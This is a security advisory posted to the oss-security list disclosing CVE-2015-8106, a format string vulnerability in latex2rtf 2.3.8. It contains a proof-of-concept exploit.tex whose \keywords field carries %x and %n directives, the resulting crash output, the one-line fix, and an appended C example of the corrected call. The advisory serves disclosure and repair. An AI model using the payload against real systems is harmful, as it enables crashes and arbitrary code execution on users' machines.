Message-ID: <5649AD62.8040704@ropas.snu.ac.kr>
Date: Mon, 16 Nov 2015 19:18:10 +0900
From: 김종권 <jgkim@...as.snu.ac.kr>
To: oss-security@...ts.openwall.com
Cc: wslee@...as.snu.ac.kr
Subject: CVE-2015-8106 - latex2rtf v2.3.8 format string vulnerability

Dear List,

I am writing this to report a format string vulnerability in the Ubuntu package latex2rtf (2.3.8, which is the latest version). I have already been assigned the CVE identifier CVE-2015-8106 by MITRE, so I want to make this vulnerability public.

- Target Platform
  Windows, Linux, OS X

- Target Version
  2.3.8 (Latest Version)

- Vulnerability description

When the user runs latex2rtf with a maliciously crafted tex file, an attacker can execute arbitrary code. The function CmdKeywords processes the \keywords command in the tex file. The variable `keywords' in the function CmdKeywords may hold a malicious input string, which is then used as the format argument of vsnprintf.

-- Step 1. (funct1.c line 1789)

  1789    char *keywords = getBraceParam();

For instance, the variable keywords will point to the string "MALICIOUS" when a text line "\keywords{MALICIOUS}" exists in an input tex file.

-- Step 2. (funct1.c line 1798)

  1798    fprintRTF(keywords);

fprintRTF() is called in line 1798, and the parameter is used as a format string, which can be malicious, as we described in step 1.

-- Step 3. (main.c line 873)

  858     void fprintRTF(char *format, ...){
          ...
  873         vsnprintf(buffer, 1024, format, apf);
          ...

The value of format, which may be malicious, is used as an argument of vsnprintf in line 873; therefore arbitrary code can be executed.

-- Step 4. Our malicious input "exploit.tex"

========================
\documentclass{article}
\begin{document}
\title{Exploitable}
\author{Jong-Gwon Kim}
\keywords{%x\%n\%n\%n}
\end{document}
=========================

Execute

==========================
~ $ latex2rtf -v
latex2rtf 2.3.8 r1240 (released June 16 2014)
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Prahl, Lehner, Granzer, Dorner, Polzer, Trisko, Schlatterbeck.
~ $ latex2rtf exploit.tex
aborted (core dumped)
==========================

-- Step 5. How to fix (funct1.c line 1798)

  1798    fprintRTF(keywords);
  ===>
  1798    fprintRTF("%s", keywords);

- How we found the vulnerability

We used a static analyzer, Sparrow[1], to find the format string bug. Our analyzer reported an alarm at line 873 of latex2rtf main.c, so we looked into the latex2rtf source code and found the bug.

Sparrow is a state-of-the-art static analyzer that aims to verify the absence of fatal bugs in C source. Sparrow is designed based on abstract interpretation, and the analysis is sound by design. Sparrow adopts a number of well-founded static analysis techniques[2,3] for scalability, precision, and user convenience.

References

[1]: http://ropas.snu.ac.kr/sparrow/
[2]: Selective Context-Sensitivity Guided by Impact Pre-Analysis. Hakjoo Oh, Wonchan Lee, Kihong Heo, Hongseok Yang, and Kwangkeun Yi. PLDI'14.
[3]: Design and Implementation of Sparse Global Analyses for C-like Languages. Hakjoo Oh, Kihong Heo, Wonchan Lee, Woosuk Lee, and Kwangkeun Yi. PLDI'12.

Sincerely,
Jong-Gwon Kim & Woosuk Lee

-----------------------------
Jong-Gwon Kim
Graduate student
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) jgkim@...as.snu.ac.kr
-----------------------------

-----------------------------
Woosuk Lee
Ph.D. candidate
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) wslee@...as.snu.ac.kr
-----------------------------
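The following is an added example, not code from latex2rtf or from the report's authors. It models the pattern described in Steps 2, 3 and 5 with a stand-in vararg wrapper (`fprintRTF_stub`, a hypothetical name) that hands its `format` straight to vsnprintf, shows the fixed call site that passes the untrusted \keywords text through a constant `"%s"` format, and adds a hypothetical review helper that counts the conversion directives an untrusted string would carry if it were ever misused as a format. The sample input is constructed to mirror the `\keywords{%x\%n\%n\%n}` payload; only the fixed call is ever executed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Portable wrapper around the GCC/Clang printf-format attribute. With it in
 * place, a call such as fprintRTF_stub(keywords) is reported by
 * -Wformat-security / -Wformat-nonliteral, which is the cheapest way to
 * catch this class of bug at build time. */
#if defined(__GNUC__)
#define PRINTF_LIKE(fmt_idx, first_arg) __attribute__((format(printf, fmt_idx, first_arg)))
#else
#define PRINTF_LIKE(fmt_idx, first_arg)
#endif

/* Output buffer standing in for latex2rtf's RTF output path (constructed for
 * this example; the real fprintRTF writes to the output file). */
static char rtf_out[1024];

/* Minimal stand-in for fprintRTF(): `format` goes directly to vsnprintf, the
 * same shape as main.c line 873 in the report. */
PRINTF_LIKE(1, 2)
static void fprintRTF_stub(const char *format, ...)
{
    va_list ap;
    va_start(ap, format);
    vsnprintf(rtf_out, sizeof rtf_out, format, ap);
    va_end(ap);
}

/* The corrected call site from Step 5: the document-controlled text is an
 * argument to a literal "%s" format, so its '%' characters are copied
 * verbatim and never interpreted as conversions. Returns the emitted text. */
const char *emit_keywords_fixed(const char *keywords)
{
    fprintRTF_stub("%s", keywords);
    return rtf_out;
}

/* Hypothetical review helper (not part of latex2rtf): count the conversion
 * directives a string would carry if it were misused as a printf format.
 * "%%" is a literal percent and is not counted. Any non-zero result on text
 * that originated in an input document is what a code reviewer or a fuzzing
 * harness assertion would flag. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* escaped percent: skip both characters */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    /* Constructed input mirroring the \keywords payload in the report. */
    const char *keywords = "%x\\%n\\%n\\%n";

    printf("directives in untrusted text: %d\n", count_format_directives(keywords));
    printf("fixed call emits: %s\n", emit_keywords_fixed(keywords));
    return 0;
}
```

Compiling with `-Wformat -Wformat-security` and the format attribute in place is the build-time check; the runtime check is that the fixed call reproduces the input byte for byte, which is exactly what a regression test for this fix should assert.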